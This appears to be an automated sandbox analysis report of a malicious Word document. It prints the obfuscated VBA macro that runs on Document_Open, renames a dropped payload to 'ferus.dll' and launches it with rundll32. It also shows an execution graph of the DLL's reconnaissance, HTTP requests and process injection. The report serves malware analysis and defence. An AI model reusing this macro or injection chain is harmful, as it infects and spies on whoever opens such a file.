                                          Subroutine hhhhh, APIs: 16, Strings: 5, Number of lines: 29, Relevance: 50.029
                                          APIsMeta Information

                                          Part of subcall function cvbc@Module3: MoveDown

                                          Part of subcall function cvbc@Module3: wdLine

                                          Part of subcall function cvbc@Module3: MoveRight

                                          Part of subcall function cvbc@Module3: wdCharacter

                                          Part of subcall function cvbc@Module3: MoveDown

                                          Part of subcall function cvbc@Module3: wdLine

                                          Part of subcall function cvbc@Module3: MoveRight

                                          Part of subcall function cvbc@Module3: wdCharacter

                                          Part of subcall function cvbc@Module3: MoveDown

                                          Part of subcall function cvbc@Module3: wdLine

                                          Dir

                                          Left

                                          vbDirectory

                                          Run

                                          		Microsoft Word:Application.Run("Getme","c:\users\albus\appdata\Local\Temp")

                                          Left

                                          TypeBackspace

                                          StringsDecrypted Strings
                                          "al""\Te"
                                          "L""o""c"
                                          """"
                                          """"
                                          "Getme"
                                          LineInstructionMeta Information
                                          4

                                          Sub hhhhh()

                                          5

                                          Dim sda

                                          executed
                                          6

                                          Dim posl as String

                                          7

                                          Dim pafh as String

                                          8

                                          Dim ntgs as Integer

                                          10

                                          pafh = pit

                                          11

                                          posl = pafh

                                          13

                                          Dim bcs as String

                                          14

                                          bcs = "al" & "\Te"

                                          17

                                          Dim yer as String

                                          18

                                          yer = "L" & "o" & "c" & bcs & "mp"

                                          23

                                          Call cvbc()

                                          24

                                          ntgs = 50

                                          25

                                          sda = 49

                                          26

                                          Dim jos as String

                                          28

                                          jos = posl

                                          30

                                          While sda < 50

                                          31

                                          ntgs = ntgs - 1

                                          33

                                          If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then

                                          Dir

                                          Left

                                          vbDirectory

                                          35

                                          Else

                                          37

                                          sda = 61

                                          38

                                          Endif

                                          40

                                          Wend

                                          41

                                          Dim klas as String

                                          42

                                          klas = posl

                                          43

                                          Dim bcsa as String

                                          44

                                          bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)

                                          Microsoft Word:Application.Run("Getme","c:\users\albus\appdata\Local\Temp")

                                          Left

                                          executed
                                          45

                                          Selection.TypeBackspace

                                          TypeBackspace

                                          48

                                          End Sub

                                          Subroutine hi, APIs: 1, Strings: 1, Number of lines: 8, Relevance: 14.008
                                          APIsMeta Information

                                          Run

                                          		Microsoft Word:Application.Run("nyd","c:\users\albus\appdata\Local\Temp","c:\users\albus\appdata\roaming\microsoft\word\ferus.dll")
                                          StringsDecrypted Strings
                                          "nyd"
                                          LineInstructionMeta Information
                                          55

                                          Sub hi(myhome as String)

                                          56

                                          Dim plop as String

                                          executed
                                          57

                                          Dim pafh as String

                                          58

                                          pafh = pit

                                          59

                                          plop = pafh

                                          60

                                          Dim kkx as String

                                          61

                                          kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")

                                          Microsoft Word:Application.Run("nyd","c:\users\albus\appdata\Local\Temp","c:\users\albus\appdata\roaming\microsoft\word\ferus.dll")

                                          executed
                                          62

                                          End Sub

                                          Subroutine q3, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          67

                                          Sub q3(dl as String)

                                          68

                                          pit = dl

                                          executed
                                          69

                                          End Sub

                                          Module: Module3

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module3"

                                          3

                                          Dim pit as String

                                          Executed Functions
                                          Subroutine cvbc, APIs: 18, Strings: 0, Number of lines: 8, Relevance: 22.508
                                          APIsMeta Information

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          Part of subcall function bcvxzc@Module3: MoveRight

                                          Part of subcall function bcvxzc@Module3: wdCharacter

                                          Part of subcall function bcvxzc@Module3: MoveDown

                                          Part of subcall function bcvxzc@Module3: wdLine

                                          Part of subcall function bcvxzc@Module3: MoveRight

                                          Part of subcall function bcvxzc@Module3: wdCharacter

                                          Part of subcall function bcvxzc@Module3: TypeBackspace

                                          Part of subcall function bcvxzc@Module3: Copy

                                          LineInstructionMeta Information
                                          69

                                          Sub cvbc()

                                          70

                                          Selection.MoveDown Unit := wdLine, Count := 1

                                          MoveDown

                                          wdLine

                                          executed
                                          71

                                          Selection.MoveRight Unit := wdCharacter, Count := 5

                                          MoveRight

                                          wdCharacter

                                          72

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          73

                                          Selection.MoveRight Unit := wdCharacter, Count := 51

                                          MoveRight

                                          wdCharacter

                                          74

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          75

                                          Call bcvxzc()

                                          76

                                          End Sub

                                          Subroutine bcvxzc, APIs: 8, Strings: 0, Number of lines: 7, Relevance: 10.007
                                          APIsMeta Information

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          TypeBackspace

                                          Copy

                                          LineInstructionMeta Information
                                          57

                                          Sub bcvxzc()

                                          58

                                          Selection.MoveRight Unit := wdCharacter, Count := 5

                                          MoveRight

                                          wdCharacter

                                          executed
                                          59

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          60

                                          Selection.MoveRight Unit := wdCharacter, Count := 51

                                          MoveRight

                                          wdCharacter

                                          61

                                          Selection.TypeBackspace

                                          TypeBackspace

                                          62

                                          Selection.Copy

                                          Copy

                                          64

                                          End Sub

                                          Subroutine nyd, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          43

                                          Sub nyd(uuu as String, aaaa as String)

                                          45

                                          Call rnee(uuu, aaaa)

                                          executed
                                          46

                                          End Sub

                                          Subroutine rnee, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          50

                                          Sub rnee(myhome as String, hsa as String)

                                          52

                                          Name myhome & "\furmt.f" As hsa

                                          executed
                                          53

                                          End Sub

                                          Subroutine q4, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          80

                                          Sub q4(dl as String)

                                          81

                                          pit = dl

                                          executed
                                          82

                                          End Sub

                                          Non-Executed Functions
                                          Subroutine checkthe, APIs: 3, Strings: 4, Number of lines: 17, Relevance: 10.517
                                          APIsMeta Information

                                          Dir

                                          Dir

                                          Run

                                          StringsDecrypted Strings
                                          """"
                                          """"
                                          "nm"
                                          "nm"
                                          LineInstructionMeta Information
                                          16

                                          Sub checkthe(sf as String)

                                          18

                                          Dim pafh as String

                                          19

                                          pafh = pit

                                          20

                                          Dim lassap as String

                                          23

                                          Dim ololow as String

                                          24

                                          ololow = sf

                                          25

                                          Dim nothings as String

                                          26

                                          nothings = 2

                                          28

                                          If Dir(sf & "\furmt.f") = "" Then

                                          Dir

                                          30

                                          Else

                                          31

                                          If Dir(nothings) = "" Then

                                          Dir

                                          33

                                          lassap = Application.Run("nm", ololow)

                                          Run

                                          34

                                          Else

                                          35

                                          Exit Sub

                                          36

                                          Endif

                                          38

                                          Endif

                                          39

                                          End Sub

                                          Module: Module4

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module4"

                                          2

                                          Dim pit as String

                                          Executed Functions
                                          Subroutine q5, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          5

                                          Sub q5(dl as String)

                                          6

                                          pit = dl

                                          executed
                                          7

                                          End Sub

                                          Non-Executed Functions
                                          Subroutine nm, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          9

                                          Sub nm(ololow as String)

                                          10

                                          Name ololow & "\furmt.f" As pit & "\" & "ferus.d" & "l" & "l"

                                          11

                                          End Sub

                                          Module: Module5

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module5"

                                          Module: Module6

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module6"

                                          Module: ThisDocument

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "ThisDocument"

                                          2

                                          Attribute VB_Base = "1Normal.ThisDocument"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = True

                                          8

                                          Attribute VB_Customizable = True

                                          10

                                          Dim ji as Integer

                                          11

                                          Dim pit as String

                                          12

                                          Dim r1, r2 as String

                                          13

                                          Dim w1, w2 as String

                                          Executed Functions
                                          Subroutine stetptwwo, APIs: 15, Strings: 6, Number of lines: 47, Relevance: 50.047
                                          APIsMeta Information

                                          Part of subcall function iep@ThisDocument: DefaultFilePath

                                          Part of subcall function iep@ThisDocument: wdAutoRecoverPath

                                          Part of subcall function chek@ThisDocument: Dir

                                          Part of subcall function hhhhh@Module2: Dir

                                          Part of subcall function hhhhh@Module2: Left

                                          Part of subcall function hhhhh@Module2: vbDirectory

                                          Part of subcall function hhhhh@Module2: Run

                                          Part of subcall function hhhhh@Module2: Left

                                          Part of subcall function hhhhh@Module2: TypeBackspace

                                          Part of subcall function ks@ThisDocument: Left

                                          Part of subcall function ks@ThisDocument: Right

                                          Part of subcall function ksa@ThisDocument: Left

                                          nmbvd

                                          CreateObject

                                          		CreateObject("WScript.Shell")

                                          Run

                                          		IWshShell3.Run("rundll32.exe c:\users\albus\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS") -> 0
                                          StringsDecrypted Strings
                                          "\ferus.d"
                                          "n"
                                          "3"
                                          "r"
                                          "l"
                                          "WScript.Shell"
                                          LineInstructionMeta Information
                                          20

                                          Sub stetptwwo()

                                          21

                                          ji = 0

                                          executed
                                          22

                                          Call iep()

                                          23

                                          Dim rx as String

                                          24

                                          Dim oys as String

                                          26

                                          Dim bcvxz as String

                                          27

                                          rx = "\ferus.d"

                                          28

                                          Dim mbnd as Integer

                                          29

                                          Dim kjhnbs as Integer

                                          30

                                          Call chek()

                                          31

                                          kjhnbs = ji

                                          33

                                          Dim jkjhb as String

                                          34

                                          If kjhnbs = 1 Then

                                          35

                                          Else

                                          36

                                          Dim jkjhbf as String

                                          39

                                          Call hhhhh()

                                          40

                                          Dim wrefs as String

                                          41

                                          wrefs = pit

                                          42

                                          bcvxz = wrefs

                                          43

                                          Dim bfdsdadad as String

                                          44

                                          Dim erfvbcz as String

                                          46

                                          bfdsdadad = "n"

                                          48

                                          Call ks()

                                          49

                                          Call ksa()

                                          51

                                          Dim bcbv as String

                                          52

                                          bcbv = nmbvd

                                          nmbvd

                                          53

                                          Dim hgfcvxv as String

                                          55

                                          Dim oloow as String

                                          56

                                          oloow = r2

                                          57

                                          werfsxv = "3" & 2 & oloow

                                          58

                                          Dim hfgv as String

                                          59

                                          hfgv = bfdsdadad & "d"

                                          62

                                          Dim htyhbv as String

                                          63

                                          htyhbv = werfsxv

                                          64

                                          Dim hgvmbm as String

                                          65

                                          hgvmbm = "r"

                                          67

                                          Dim luyhgdffs as String

                                          68

                                          luyhgdffs = "l"

                                          69

                                          Dim bcvsdsf as String

                                          70

                                          bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv

                                          73

                                          hgfcvxv = r1

                                          74

                                          oys = bcvxz & rx & hgfcvxv & hgfcvxv & ",YYUNXEGQRYS"

                                          77

                                          Dim xcvxv as Object

                                          78

                                          Set xcvxv = VBA.CreateObject("WScript.Shell")

                                          CreateObject("WScript.Shell")

                                          executed
                                          80

                                          xcvxv.Run bcvsdsf & " " & oys

                                          IWshShell3.Run("rundll32.exe c:\users\albus\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS") -> 0

                                          executed
                                          82

                                          Endif

                                          83

                                          End Sub

                                          Subroutine Document_Open, APIs: 3, Strings: 0, Number of lines: 3, Relevance: 6.003
                                          APIsMeta Information

                                          Part of subcall function stetptwwo@ThisDocument: nmbvd

                                          Part of subcall function stetptwwo@ThisDocument: CreateObject

                                          Part of subcall function stetptwwo@ThisDocument: Run

                                          LineInstructionMeta Information
                                          14

                                          Private Sub Document_Open()

                                          15

                                          Call stetptwwo()

                                          executed
                                          16

                                          End Sub

                                          Subroutine ks, APIs: 3, Strings: 0, Number of lines: 7, Relevance: 3.757
                                          APIsMeta Information

                                          Part of subcall function xzczxc@ThisDocument: Cell

                                          Left

                                          Right

                                          LineInstructionMeta Information
                                          121

                                          Sub ks()

                                          122

                                          Dim askl as String

                                          executed
                                          123

                                          Call xzczxc()

                                          124

                                          askl = w1

                                          125

                                          r1 = Left(askl, 3)

                                          Left

                                          127

                                          r1 = Right(r1, 1)

                                          Right

                                          129

                                          End Sub

                                          Subroutine chek, APIs: 1, Strings: 1, Number of lines: 11, Relevance: 3.011
                                          APIsMeta Information

                                          Dir

                                          StringsDecrypted Strings
                                          """"
                                          LineInstructionMeta Information
                                          90

                                          Sub chek()

                                          92

                                          Dim jos as String

                                          executed
                                          93

                                          Dim pafh as String

                                          94

                                          pafh = pit

                                          95

                                          jos = pafh

                                          98

                                          If Dir(jos & "\ferus.d" & "l" & "l") = "" Then

                                          Dir

                                          99

                                          ji = 0

                                          100

                                          Else

                                          102

                                          ji = 1

                                          103

                                          Endif

                                          104

                                          End Sub

                                          Subroutine iep, APIs: 2, Strings: 0, Number of lines: 9, Relevance: 2.509
                                          APIsMeta Information

                                          DefaultFilePath

                                          wdAutoRecoverPath

                                          LineInstructionMeta Information
                                          140

                                          Sub iep()

                                          141

                                          Dim kf as String

                                          executed
                                          142

                                          kf = Options.DefaultFilePath(wdAutoRecoverPath)

                                          DefaultFilePath

                                          wdAutoRecoverPath

                                          143

                                          Call q1(kf)

                                          144

                                          Call q2(kf)

                                          145

                                          Call q3(kf)

                                          146

                                          Call q4(kf)

                                          147

                                          Call q5(kf)

                                          148

                                          End Sub

                                          Subroutine ksa, APIs: 2, Strings: 0, Number of lines: 6, Relevance: 2.506
                                          APIsMeta Information

                                          Part of subcall function vvvvvvvx@ThisDocument: Cell

                                          Left

                                          LineInstructionMeta Information
                                          131

                                          Sub ksa()

                                          132

                                          Dim askl as String

                                          executed
                                          133

                                          Call vvvvvvvx()

                                          134

                                          askl = w2

                                          135

                                          r2 = Left(askl, 4)

                                          Left

                                          136

                                          End Sub

                                          Subroutine xzczxc, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253
                                          APIsMeta Information

                                          Cell

                                          LineInstructionMeta Information
                                          108

                                          Sub xzczxc()

                                          109

                                          w1 = ThisDocument.Tables(1).Cell(1, 1).Range.Text

                                          Cell

                                          executed
                                          110

                                          End Sub

                                          Subroutine vvvvvvvx, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253
                                          APIsMeta Information

                                          Cell

                                          LineInstructionMeta Information
                                          115

                                          Sub vvvvvvvx()

                                          116

                                          w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text

                                          Cell

                                          executed
                                          117

                                          End Sub

                                          Subroutine q1, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          137

                                          Sub q1(dl as String)

                                          138

                                          pit = dl

                                          executed
                                          139

                                          End Sub

                                          Reset < >

                                            Analysis Process: rundll32.exe PID: 2504 Parent PID: 2480 rundll32.exeCOMMON

                                            Execution Graph

                                            Execution Coverage:8.6%
                                            Dynamic/Decrypted Code Coverage:51.1%
                                            Signature Coverage:23.6%
                                            Total number of Nodes:622
                                            Total number of Limit Nodes:9

                                            Graph

                                            execution_graph 12124 c73f0 12125 c7415 12124->12125 12133 c6820 12125->12133 12127 c751f 12136 c6d70 VirtualAlloc 12127->12136 12129 c7558 12130 c755c 12129->12130 12131 c6820 VirtualAlloc 12129->12131 12132 c756d 12131->12132 12134 c6861 12133->12134 12135 c6894 VirtualAlloc 12134->12135 12135->12127 12138 c6dd8 12136->12138 12142 c6b20 12138->12142 12139 c6f6f 12139->12129 12140 c6eb7 12140->12139 12141 c6f41 VirtualProtect 12140->12141 12141->12140 12143 c6c00 12142->12143 12145 c6b4e 12142->12145 12143->12140 12144 c6b64 LoadLibraryExA 12144->12145 12145->12143 12145->12144 12146 c6bc0 GetProcAddress 12145->12146 12146->12145 12147 1c19e0 12148 1c19ec 12147->12148 12149 1c19f1 12147->12149 12151 1c1870 12148->12151 12165 1c1390 12151->12165 12154 1c1390 2 API calls 12155 1c1895 12154->12155 12156 1c1390 2 API calls 12155->12156 12157 1c18a5 12156->12157 12158 1c197a 12157->12158 12160 1c195a Sleep 12157->12160 12170 1c1aa0 12157->12170 12195 1c1630 12157->12195 12212 1c14e0 12157->12212 12158->12149 12206 1c15c0 12160->12206 12166 1c139c GetProcessHeap 12165->12166 12167 1c13a7 12165->12167 12166->12167 12168 1c13c5 12167->12168 12169 1c13b0 RtlAllocateHeap 12167->12169 12168->12154 12169->12168 12217 1c1420 12170->12217 12183 1c1b69 12186 1c25b0 10 API calls 12183->12186 12184 1c1b2a 12250 1c25b0 12184->12250 12188 1c1b88 wsprintfA 12186->12188 12189 1c1ba6 12188->12189 12190 1c1bb9 12189->12190 12191 1c1390 2 API calls 12189->12191 12194 1c1c4a 12190->12194 12256 1c28d0 12190->12256 12276 1c2660 12190->12276 12191->12190 12194->12157 12196 1c164f 12195->12196 12200 1c1648 12195->12200 12197 1c16dc 12196->12197 12198 1c16bf 12196->12198 12199 1c1685 12196->12199 12196->12200 12201 1c16a0 12196->12201 12357 1c1e80 12197->12357 12386 1c1e00 12198->12386 12368 1c1ef0 12199->12368 12200->12157 12377 1c1f60 12201->12377 12207 1c15cf 12206->12207 12208 1c161e Sleep 12207->12208 12210 1c1630 56 API calls 12207->12210 12505 1c1740 12207->12505 12509 1c1980 12207->12509 12208->12157 12210->12207 12213 1c14ed 12212->12213 12214 1c154c 12213->12214 12215 1c1390 2 API calls 12213->12215 12214->12157 12216 1c1513 lstrcpyA 12215->12216 12216->12214 12218 1c1434 GetVersion 12217->12218 12219 1c2630 12218->12219 12220 1c1abb 12219->12220 12221 1c2640 12219->12221 12223 1c30f0 GetComputerNameA 12220->12223 12280 1c1c70 12221->12280 12224 1c3124 lstrcatA 12223->12224 12225 1c3135 lstrcatA 12223->12225 12224->12225 12293 1c2df0 12225->12293 12228 1c1acd 12230 1c2520 12228->12230 12229 1c3157 lstrcatA 12229->12228 12231 1c254d 12230->12231 12232 1c2537 lstrcpyA 12230->12232 12322 1c1fe0 12231->12322 12234 1c1ad9 12232->12234 12238 1c23c0 DsEnumerateDomainTrustsA 12234->12238 12236 1c258a lstrcpyA 12236->12234 12237 1c256a lstrcpyA 12237->12234 12239 1c1ae8 12238->12239 12240 1c23f2 12238->12240 12243 1c3400 12239->12243 12240->12239 12241 1c2429 lstrcatA lstrcatA 12240->12241 12242 1c245b lstrcatA lstrcatA 12240->12242 12241->12240 12242->12240 12244 1c14a0 12243->12244 12245 1c3413 GetModuleHandleA 12244->12245 12246 1c342e GetProcAddress 12245->12246 12249 1c1b21 12245->12249 12247 1c344f GetSystemInfo 12246->12247 12248 1c3446 GetNativeSystemInfo 12246->12248 12247->12249 12248->12249 12249->12183 12249->12184 12251 1c25c4 12250->12251 12255 1c1b49 wsprintfA 12250->12255 12252 1c1390 2 API calls 12251->12252 12253 1c25dd 12252->12253 12345 1c2cd0 CryptAcquireContextA 12253->12345 12255->12189 12257 1c14a0 12256->12257 12258 1c28e6 lstrlenA 12257->12258 12259 1c2958 InternetCrackUrlA 12258->12259 12260 1c294b lstrlenA 12258->12260 12261 1c2975 12259->12261 12273 1c296e 12259->12273 12260->12259 12262 1c24f0 InternetOpenA 12261->12262 12261->12273 12263 1c299a 12262->12263 12264 1c29cb InternetConnectA 12263->12264 12263->12273 12265 1c29fb HttpOpenRequestA 12264->12265 12264->12273 12266 1c2a29 InternetCloseHandle 12265->12266 12267 1c2a3a 12265->12267 12266->12273 12268 1c2a79 HttpSendRequestA 12267->12268 12269 1c2a40 InternetQueryOptionA InternetSetOptionA 12267->12269 12270 1c2b0f InternetCloseHandle InternetCloseHandle 12268->12270 12271 1c2aa4 HttpQueryInfoA 12268->12271 12269->12268 12270->12273 12271->12270 12272 1c2acd 12271->12272 12272->12270 12274 1c2ad3 InternetReadFile 12272->12274 12273->12190 12275 1c2af0 12274->12275 12275->12270 12277 1c266c 12276->12277 12279 1c2684 12276->12279 12278 1c25b0 10 API calls 12277->12278 12277->12279 12278->12279 12279->12190 12281 1c1390 2 API calls 12280->12281 12282 1c1c8e 12281->12282 12287 1c13d0 12282->12287 12286 1c1d15 12286->12220 12288 1c13dc HeapFree 12287->12288 12289 1c13ef 12287->12289 12288->12289 12290 1c2490 GetWindowsDirectoryA 12289->12290 12291 1c24e5 12290->12291 12292 1c24b4 GetVolumeInformationA 12290->12292 12291->12286 12292->12291 12300 1c2e90 12293->12300 12298 1c2e4c lstrcpyA lstrcatA lstrcatA 12299 1c2e84 12298->12299 12299->12228 12299->12229 12301 1c1420 12300->12301 12302 1c2e9d K32EnumProcesses 12301->12302 12303 1c2e03 12302->12303 12305 1c2ebb 12302->12305 12306 1c3000 OpenProcess 12303->12306 12305->12303 12317 1c2f30 OpenProcess 12305->12317 12307 1c3027 OpenProcessToken 12306->12307 12316 1c2e45 12306->12316 12308 1c3045 GetTokenInformation 12307->12308 12307->12316 12309 1c3064 GetLastError 12308->12309 12308->12316 12310 1c3073 12309->12310 12309->12316 12311 1c1390 2 API calls 12310->12311 12312 1c307c GetTokenInformation 12311->12312 12313 1c30d1 12312->12313 12314 1c30ab LookupAccountSidA 12312->12314 12315 1c13d0 HeapFree 12313->12315 12314->12313 12315->12316 12316->12298 12316->12299 12318 1c2feb 12317->12318 12319 1c2f57 K32GetProcessImageFileNameA CloseHandle 12317->12319 12318->12305 12319->12318 12320 1c2f7f 12319->12320 12320->12318 12321 1c2fd6 lstrcpyA 12320->12321 12321->12318 12340 1c14a0 12322->12340 12325 1c205d 12336 1c2056 12325->12336 12342 1c24f0 12325->12342 12328 1c20b3 InternetConnectA 12329 1c20e3 HttpOpenRequestA 12328->12329 12328->12336 12330 1c2111 InternetCloseHandle 12329->12330 12331 1c2122 12329->12331 12330->12336 12332 1c2128 InternetQueryOptionA InternetSetOptionA 12331->12332 12333 1c2160 HttpSendRequestA HttpQueryInfoA 12331->12333 12332->12333 12334 1c2204 InternetCloseHandle InternetCloseHandle 12333->12334 12335 1c21a2 12333->12335 12334->12336 12335->12334 12337 1c21ba InternetReadFile 12335->12337 12336->12236 12336->12237 12338 1c21d9 12337->12338 12339 1c2200 12337->12339 12338->12335 12338->12339 12339->12334 12341 1c14ac InternetCrackUrlA 12340->12341 12341->12325 12341->12336 12343 1c24fc InternetOpenA 12342->12343 12344 1c2082 12342->12344 12343->12344 12344->12328 12344->12336 12346 1c2d1c CryptCreateHash 12345->12346 12348 1c2d12 12345->12348 12347 1c2d3b CryptHashData 12346->12347 12346->12348 12347->12348 12351 1c2d57 CryptDeriveKey 12347->12351 12349 1c2da6 CryptDestroyHash 12348->12349 12350 1c2db7 12348->12350 12349->12350 12353 1c2dbd CryptDestroyKey 12350->12353 12354 1c2dce 12350->12354 12351->12348 12352 1c2d7a CryptDecrypt 12351->12352 12352->12348 12353->12354 12355 1c2dd4 CryptReleaseContext 12354->12355 12356 1c2de7 12354->12356 12355->12356 12356->12255 12358 1c1390 2 API calls 12357->12358 12359 1c1e96 12358->12359 12395 1c2230 12359->12395 12361 1c1eba 12362 1c1ed9 12361->12362 12363 1c1ec2 12361->12363 12365 1c13d0 HeapFree 12362->12365 12405 1c2b80 12363->12405 12367 1c1ee2 12365->12367 12367->12200 12369 1c1390 2 API calls 12368->12369 12370 1c1f06 12369->12370 12371 1c2230 16 API calls 12370->12371 12372 1c1f2a 12371->12372 12373 1c1f3f 12372->12373 12447 1c3b30 GetTempPathA GetTempFileNameA 12372->12447 12375 1c13d0 HeapFree 12373->12375 12376 1c1f52 12375->12376 12376->12200 12378 1c1390 2 API calls 12377->12378 12379 1c1f76 12378->12379 12380 1c2230 16 API calls 12379->12380 12381 1c1f9a 12380->12381 12382 1c1fb7 12381->12382 12465 1c3880 12381->12465 12383 1c13d0 HeapFree 12382->12383 12385 1c1fca 12383->12385 12385->12200 12387 1c1390 2 API calls 12386->12387 12388 1c1e16 12387->12388 12389 1c2230 16 API calls 12388->12389 12390 1c1e3a 12389->12390 12391 1c1e55 12390->12391 12480 1c3730 12390->12480 12393 1c13d0 HeapFree 12391->12393 12394 1c1e68 12393->12394 12394->12200 12396 1c2242 12395->12396 12397 1c1fe0 12 API calls 12396->12397 12399 1c22e0 12396->12399 12398 1c2262 12397->12398 12398->12399 12402 1c226a 12398->12402 12400 1c1fe0 12 API calls 12399->12400 12401 1c2299 12399->12401 12404 1c1d40 4 API calls 12399->12404 12400->12399 12401->12361 12402->12401 12418 1c1d40 12402->12418 12404->12399 12406 1c2b96 12405->12406 12409 1c1ecf 12406->12409 12425 1c2c40 12406->12425 12409->12362 12412 1c2c08 12413 1c2c0e TerminateProcess 12412->12413 12414 1c2c1a CloseHandle CloseHandle 12412->12414 12413->12414 12414->12409 12417 1c2bfb GetProcessId 12417->12412 12419 1c1390 2 API calls 12418->12419 12421 1c1d4f RtlDecompressBuffer 12419->12421 12422 1c1dc2 12421->12422 12423 1c13d0 HeapFree 12422->12423 12424 1c1ddf 12423->12424 12424->12401 12426 1c14a0 12425->12426 12427 1c2c56 GetEnvironmentVariableA lstrcatA CreateProcessA 12426->12427 12428 1c2bb1 12427->12428 12428->12409 12429 1c3270 12428->12429 12430 1c32a9 VirtualAllocEx 12429->12430 12431 1c32cb VirtualAllocEx 12430->12431 12438 1c32eb 12430->12438 12431->12438 12432 1c1390 2 API calls 12432->12438 12433 1c13d0 HeapFree 12436 1c338b 12433->12436 12434 1c32f1 12434->12433 12434->12436 12435 1c2bd6 12435->12412 12440 1c37e0 12435->12440 12436->12435 12437 1c339a VirtualFreeEx 12436->12437 12437->12435 12438->12430 12438->12432 12438->12434 12439 1c334f WriteProcessMemory 12438->12439 12439->12434 12439->12438 12441 1c14a0 12440->12441 12442 1c3806 GetThreadContext 12441->12442 12443 1c2bf3 12442->12443 12444 1c3822 WriteProcessMemory 12442->12444 12443->12412 12443->12417 12444->12443 12445 1c3846 SetThreadContext 12444->12445 12445->12443 12446 1c3868 ResumeThread 12445->12446 12446->12443 12455 1c3ac0 12447->12455 12449 1c3bbf 12449->12373 12450 1c3b7a 12450->12449 12451 1c3bc6 12450->12451 12452 1c3b97 wsprintfA 12450->12452 12454 1c36c0 3 API calls 12451->12454 12460 1c36c0 12452->12460 12454->12449 12456 1c3aca 12455->12456 12458 1c3b1e 12455->12458 12457 1c3ad0 CreateFileA 12456->12457 12456->12458 12457->12458 12459 1c3af5 WriteFile CloseHandle 12457->12459 12458->12450 12459->12458 12461 1c14a0 12460->12461 12462 1c36da CreateProcessA 12461->12462 12463 1c3705 CloseHandle CloseHandle 12462->12463 12464 1c3701 12462->12464 12463->12464 12464->12449 12466 1c391d VirtualAlloc 12465->12466 12467 1c3890 12465->12467 12468 1c3939 12466->12468 12477 1c38a4 12466->12477 12469 1c2c40 3 API calls 12467->12469 12473 1c3953 CreateThread 12468->12473 12468->12477 12470 1c389d 12469->12470 12471 1c38ab VirtualAllocEx 12470->12471 12470->12477 12472 1c38cb WriteProcessMemory 12471->12472 12471->12477 12474 1c38e7 CreateRemoteThread 12472->12474 12472->12477 12475 1c3973 CloseHandle 12473->12475 12473->12477 12478 1c39e0 12473->12478 12476 1c390a CloseHandle 12474->12476 12474->12477 12475->12477 12476->12477 12477->12382 12479 1c39ed 12478->12479 12481 1c373f 12480->12481 12488 1c3746 12481->12488 12489 1c3180 12481->12489 12486 1c377c CreateThread 12487 1c379c CloseHandle 12486->12487 12486->12488 12503 1c39a0 12486->12503 12487->12488 12488->12391 12490 1c31b2 VirtualAlloc 12489->12490 12491 1c31d0 VirtualAlloc 12490->12491 12495 1c31ec 12490->12495 12491->12495 12492 1c31f2 12493 1c3263 12492->12493 12494 1c3252 VirtualFree 12492->12494 12493->12488 12496 1c3580 12493->12496 12494->12493 12495->12490 12495->12492 12502 1c35bb 12496->12502 12497 1c35c8 GetModuleHandleA 12499 1c35ee LoadLibraryA 12497->12499 12497->12502 12498 1c3601 12498->12486 12498->12488 12499->12502 12500 1c366e GetProcAddress 12500->12502 12501 1c3653 GetProcAddress 12501->12502 12502->12497 12502->12498 12502->12500 12502->12501 12504 1c39cf 12503->12504 12506 1c1773 12505->12506 12508 1c1750 12505->12508 12507 1c13d0 HeapFree 12506->12507 12506->12508 12507->12508 12508->12207 12510 1c19a0 12509->12510 12511 1c1990 12509->12511 12510->12207 12512 1c13d0 HeapFree 12511->12512 12512->12510 12513 192df4 12514 192df7 12513->12514 12521 1855d8 12514->12521 12518 192e0e 12544 183890 12518->12544 12522 1855e3 12521->12522 12551 183664 12522->12551 12525 192358 12526 182628 25 API calls 12525->12526 12527 1923c1 GetUserNameA 12526->12527 12528 1923e1 12527->12528 12529 192402 GetUserNameA 12528->12529 12530 192d2f 12528->12530 12529->12529 12531 19241e 12529->12531 12530->12518 12801 1916d8 12531->12801 12533 19243a 12534 192469 GetEnhMetaFileA GetEnhMetaFileA 12533->12534 12534->12534 12535 192486 12534->12535 12536 182628 25 API calls 12535->12536 12537 19249a 12536->12537 12805 191374 12537->12805 12539 1924b2 12540 1924bc VirtualAllocEx 12539->12540 12541 192519 12540->12541 12542 192587 172 API calls 12541->12542 12543 192d06 12541->12543 12542->12542 12542->12543 12543->12518 12545 1838a9 12544->12545 12546 183804 5 API calls 12545->12546 12547 1838d2 12545->12547 12546->12547 12548 183914 